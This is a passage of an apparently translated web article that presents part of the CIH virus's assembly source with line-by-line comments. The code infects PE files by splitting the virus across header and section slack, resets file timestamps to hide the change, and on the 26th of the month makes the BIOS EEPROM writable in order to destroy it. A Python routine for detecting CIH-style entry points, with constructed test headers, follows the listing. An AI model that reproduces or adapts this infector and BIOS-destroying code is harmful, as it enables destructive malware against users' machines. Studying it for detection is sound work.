Virus program source code instance analysis-CIH virus [4]

Source: Internet
Author: User
This part continues the listing in "Virus program source code instance analysis: example code of CIH virus [2]"; refer to that part for the preceding code.

        push    eax                     ; block table size
        push    edx                     ; edx = file offset of the virus code block table
        push    esi                     ; buffer address

; The merged virus code blocks plus the virus code block table must fit in the unused space
        inc     ecx
        push    ecx                     ; save NumberOfSections+1

        shl     ecx, 03h                ; multiply by 8
        push    ecx                     ; space reserved for the virus block table

        add     ecx, eax
        add     ecx, edx                ; ecx += offset within the file body

        sub     ecx, (SizeOfHeaders-@9)[esi]
        not     ecx
        inc     ecx                     ; negate: ecx = SizeOfHeaders - used header size = unused space

        push    ecx

        xchg    ecx, eax                ; ecx = block table size

        mov     eax, (AddressOfEntryPoint-@9)[esi]               ; entry point RVA
        add     eax, (ImageBase-@9)[esi]                         ; plus the load base
        mov     (OriginalAddressOfEntryPoint-@9)[esi], eax       ; save the real entry address after loading

; Compare the unused space with the size of the first virus part; if it is too small, only set the infected flag
        cmp     word ptr [esp], small CodeSizeOfMergeVirusCodeSection
        jl      OnlySetInfectedMark

; Read the whole section table
        mov     eax, ebp                ; read function number
        call    edi                     ; read the section table into esi (@9)

; The following fully handles the WinZip self-extracting file problem: a self-extracting
; file is not infected. The virus first takes PointerToRawData from the second section
; header, reads the data there and checks whether it contains "WinZip (R)".
        xchg    eax, ebp
        push    00000004h
        pop     ecx                     ; read 4 bytes

        push    edx
        mov     edx, (SizeOfScetionTable+PointerToRawData-@9)[ebx]
                                        ; edx = file offset of the second section (.rdata)

        add     edx, 12h                ; add 10h+2h ("WinZip..." starts at 10h)

        call    edi                     ; read 4 bytes into esi

; Is it a WinZip self-extractor? If so, do not set the infected flag
        cmp     dword ptr [esi], 'pizn'
        je      NotSetInfectedMark

        pop     edx                     ; edx = file offset of the start of the section table

; Set up the virus code block table
        pop     ebx                     ; unused space size
        pop     edi                     ; edi = TotalSizeOfVirusCodeSectionTable
        pop     ecx                     ; ecx = NumberOfSections+1

        push    edi
        add     edx, ebp                ; ebp = section table size
        push    edx                     ; file pointer

        add     ebp, esi                ; ebp now points past the section table in the virus data area (first block)
        push    ebp                     ; buffer address

; Set the size of the first virus code block
        lea     eax, [ebp+edi-04h]
        mov     [eax], ebx

; Set the first virus block
        push    ebx                     ; size of the first part of the virus code

        add     edx, edi
        push    edx                     ; file pointer
        lea     edi, (MyVirusStart-@9)[esi]
        push    edi                     ; buffer address

; Point AddressOfEntryPoint at the virus entry
        mov     (NewAddressOfEntryPoint-@9)[esi], edx    ; save the new program entry (virus body)

; Set the initial data
        lea     edx, [esi-SizeOfScetionTable]            ; edx starts one section header before the table
        mov     ebp, offset VirusSize                    ; ebp = virus length

        jmp     StartToWriteCodeToSections

; Write the virus block information
LoopOfWriteCodeToSections:
        add     edx, SizeOfScetionTable
        mov     ebx, (SizeOfRawData-@9)[edx]             ; ebx = SizeOfRawData (section size) of this header
        sub     ebx, (VirtualSize-@9)[edx]               ; minus VirtualSize = unused space in the section
        jbe     EndOfWriteCodeToSections

        push    ebx                     ; size

        sub     eax, 08h
        mov     [eax], ebx              ; write to the virus block table

        mov     ebx, (PointerToRawData-@9)[edx]          ; ebx = physical (file) offset of the section
        add     ebx, (VirtualSize-@9)[edx]               ; plus VirtualSize
        push    ebx                     ; ebx = file pointer of the unused space

        push    edi                     ; buffer address

        mov     ebx, (VirtualSize-@9)[edx]
        add     ebx, (VirtualAddress-@9)[edx]
        add     ebx, (ImageBase-@9)[esi]                 ; ebx = actual address of the block after loading
        mov     [eax+4], ebx            ; save to the virus block table

        mov     ebx, [eax]              ; unused space size of the section
        add     (VirtualSize-@9)[edx], ebx               ; extend VirtualSize in the section header

; Modify the characteristics of this section header (readable, contains initialized data)
        or      (Characteristics-@9)[edx], 40000040h

; Start writing code
StartToWriteCodeToSections:
        sub     ebp, ebx                ; virus size - virus block size

; If nothing remains (the whole virus has been placed), set the end mark of the virus block table
        jbe     SetVirusCodeSectionTableEndMark

        add     edi, ebx                ; point to the next part of the virus

; End of code writing
EndOfWriteCodeToSections:
        loop    LoopOfWriteCodeToSections

OnlySetInfectedMark:
        mov     esp, dr1                ; only set the infection mark

        jmp     WriteVirusCodeToFile    ; go to the routine that writes the virus to the file

; Do not set the infection mark
NotSetInfectedMark:
        add     esp, 3ch
        jmp     CloseFile               ; go to CloseFile

; Set the virus block table end mark
SetVirusCodeSectionTableEndMark:
; Adjust the virus block code
        add     [eax], ebp              ; correct the last entry of the virus block table
        add     [esp+08h], ebp

; Set the block table end flag
        xor     ebx, ebx
        mov     [eax-04h], ebx

; Restore the VxD call sites: VMM patches each "int 20h" service call in place after it first runs
        lea     eax, (LastVxdCallAddress-2-@9)[esi]     ; address of the last VxD call

        mov     cl, VxdCallTableSize    ; number of VxD calls used

LoopOfRestoreVxdCallID:
        mov     word ptr [eax], 20cdh   ; the "int 20h" form

; Get the ID of the VxD call from VxdCallIDTable into edx
        mov     edx, (VxdCallIDTable+(ecx-1)*04h-@9)[esi]

        mov     [eax+2], edx            ; place it after "int 20h"

; VxdCallAddressTable holds the distances between the VxD call instructions
        movzx   edx, byte ptr (VxdCallAddressTable+ecx-1-@9)[esi]

        sub     eax, edx                ; eax = address of the previous call

        loop    LoopOfRestoreVxdCallID  ; restore the other calls

; Write the virus code to the file
WriteVirusCodeToFile:
        mov     eax, dr1                ; dr1 holds the saved esp
        mov     ebx, [eax+10h]          ; ebx = file handle saved on the stack
        mov     edi, [eax]              ; edi = IFSMgr_Ring0_FileIO call address saved on the stack

; Write in a loop
LoopOfWriteVirusCodeToFile:
        pop     ecx                     ; offset of each segment of the virus code
        jecxz   SetFileModificationMark ; a zero offset ends the list

        mov     esi, ecx
        mov     eax, 0d601h             ; file write function number (R0_WRITEFILE)
        pop     edx                     ; file pointer
        pop     ecx                     ; number of bytes to write

        call    edi                     ; VxD call IFSMgr_Ring0_FileIO to write the file
; This writes the virus code, the virus block table, the new section table,
; the new program entry and the infection mark
        jmp     LoopOfWriteVirusCodeToFile

; Restore the file's last modification time so the user does not notice that the file changed
SetFileModificationMark:
        pop     ebx
        pop     eax

        stc                             ; set the carry flag
        pushf                           ; save the flags on the stack

; Close the file
CloseFile:
        xor     eax, eax
        mov     ah, 0d7h                ; file close function number
        call    edi                     ; VxD call IFSMgr_Ring0_FileIO to close the file

        popf
        pop     esi
        jnc     IsKillComputer          ; carry clear: go to IsKillComputer

; Restore the file modification time
        mov     ebx, edi

        mov     ax, 4303h
        mov     ecx, (FileModificationTime-@7)[esi]
        mov     edi, (FileModificationTime+2-@7)[esi]
        call    ebx                     ; VxD call IFSMgr_Ring0_FileIO to set the last modification time

; Clear the "busy" flag
DisableOnBusy:
        dec     byte ptr (OnBusy-@7)[esi]

; Call the original FileSystemApiHook
Prevhook:
        popad                           ; restore all registers

        mov     eax, dr0                ; address of the saved original file system hook
        jmp     [eax]                   ; jump to the original hook

PIFSFunc:
        mov     ebx, esp                ; ebx = esp, to reach the FileSystemApiHookFunction parameters
        push    dword ptr [ebx+20h+04h+14h]              ; push the pioreq pointer (pir)
        call    [ebx+20h+04h]           ; call pIFSFunc (FSDFnAddr)
        pop     ecx

        mov     [ebx+1ch], eax          ; replace the saved eax with the return value

; Take data from the pioreq returned by pIFSFunc
        cmp     dword ptr [ebx+20h+04h+04h], 00000024h
        jne     QuitMyVirusFileSystemHook

; Get the file's modification date and time in DOS format
        mov     eax, [ecx+28h]
        mov     (FileModificationTime-@6)[esi], eax      ; save the file date and time

; Leave the virus hook
QuitMyVirusFileSystemHook:
        popad                           ; restore all registers

        ret                             ; return from the file hook installed by the virus

; Damage the computer's BIOS
IsKillComputer:
; Get the current date from the BIOS CMOS
        mov     al, 07h
        out     70h, al
        in      al, 71h

        xor     al, 26h                 ; is it the 26th?

; In debug builds, always jump to DisableOnBusy
IF DEBUG
        jmp     DisableOnBusy
ELSE
        jnz     DisableOnBusy           ; not the 26th: go to DisableOnBusy without doing damage
ENDIF

; Start to destroy the BIOS EEPROM
        mov     bp, 0cf8h
        lea     esi, IOForEEPROM-@7[esi]

; Show the BIOS page at 000E0000-000EFFFF (64 KB)
        mov     edi, 8000384ch
        mov     dx, 0cfeh
        cli
        call    esi

; Show the BIOS page at 000F0000-000FFFFF (64 KB)
        mov     di, 0058h
        dec     edx                     ; and al, 0fh
        mov     word ptr (BooleanCalculateCode-@10)[esi], 0f24h
        call    esi

; Show and enable the extra BIOS ROM data at 000E0000-000E01FF (512 bytes)
; and make the BIOS block writable
        lea     ebx, EnableEEPROMToWrite-@10[esi]

        mov     eax, 0e5555h
        mov     ecx, 0e2aaah
        call    ebx
        mov     byte ptr [eax], 60h
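As a defender's check on the two header tricks this routine relies on (the first fragment placed in the header slack below SizeOfHeaders with AddressOfEntryPoint pointed at it, and later fragments placed in section cavities whose Characteristics gain only 40000040h), here is an added example, not code from the original listing, that parses PE32 headers with Python's struct module and flags such entry points; build_pe and the HOST layout are constructed test data, not a real file.

```python
import struct

# PE section flags. The routine above ORs 40000040h (MEM_READ | CNT_INITIALIZED_DATA)
# into the host section header and never sets CNT_CODE or MEM_EXECUTE.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
def parse_pe(data):
    """Return (AddressOfEntryPoint, SizeOfHeaders, section headers) of a PE32 image."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]             # e_lfanew
    nsec, opt_size = struct.unpack_from("<H", data, pe + 6)[0], struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24                                             # optional header start
    entry, hdr_size = struct.unpack_from("<I", data, opt + 16)[0], struct.unpack_from("<I", data, opt + 60)[0]
    sections = []
    for i in range(nsec):
        off = opt + opt_size + 40 * i
        name, vsize, va, rawsize = struct.unpack_from("<8sIII", data, off)
        flags = struct.unpack_from("<I", data, off + 36)[0]   # Characteristics
        sections.append((name.rstrip(b"\0").decode(), vsize, va, rawsize, flags))
    return entry, hdr_size, sections

def cih_indicators(data):
    """Header-only checks for where the infection routine above moves the entry point."""
    entry, hdr_size, sections = parse_pe(data)
    found = []
    if entry < hdr_size:          # first virus fragment sits in the header slack
        found.append("entry point inside PE headers")
    for name, vsize, va, rawsize, flags in sections:
        if va <= entry < va + max(vsize, rawsize) and \
                not flags & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE):
            found.append("entry point in non-executable section " + name)
    return found
def section_slack(data):
    """Per-section cavity SizeOfRawData - VirtualSize, the space the write loop above fills."""
    return {s[0]: max(s[3] - s[1], 0) for s in parse_pe(data)[2]}
def build_pe(entry, sections):
    """Constructed minimal PE32 header image (no section bodies), for testing only."""
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    coff = struct.pack("<IHHIIIHH", 0x4550, 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)                                                     # PE32 optional header
    for fmt, off, val in (("<H", 0, 0x10B), ("<I", 16, entry), ("<I", 28, 0x400000), ("<I", 60, 0x400)):
        struct.pack_into(fmt, opt, off, val)          # Magic, AddressOfEntryPoint, ImageBase, SizeOfHeaders
    tbl = b"".join(struct.pack("<8sIIIIIIHHI", n.encode(), vs, va, rs, rp, 0, 0, 0, 0, fl)
                   for n, vs, va, rs, rp, fl in sections)
    return (dos + coff + opt + tbl).ljust(0x400, b"\0")

# Constructed host layout: (name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, flags)
HOST = [(".text", 0x800, 0x1000, 0x1000, 0x400, 0x60000020),
        (".rdata", 0x300, 0x2000, 0x400, 0x1400, 0x40000040)]
CLEAN = build_pe(0x1000, HOST)      # entry at the start of .text
HEADER_EP = build_pe(0x250, HOST)   # entry moved into the header slack, as the code above does
```

section_slack reports the cavities the write loop would fill, which on a real file is best compared against a known-good copy rather than judged alone.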
